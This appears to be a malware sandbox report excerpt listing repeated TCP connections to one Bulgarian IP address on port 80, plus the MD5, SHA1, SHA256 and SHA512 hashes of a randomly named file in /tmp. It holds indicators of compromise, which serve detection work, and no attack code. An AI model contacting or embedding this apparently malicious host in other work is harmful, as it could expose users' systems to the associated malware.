BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97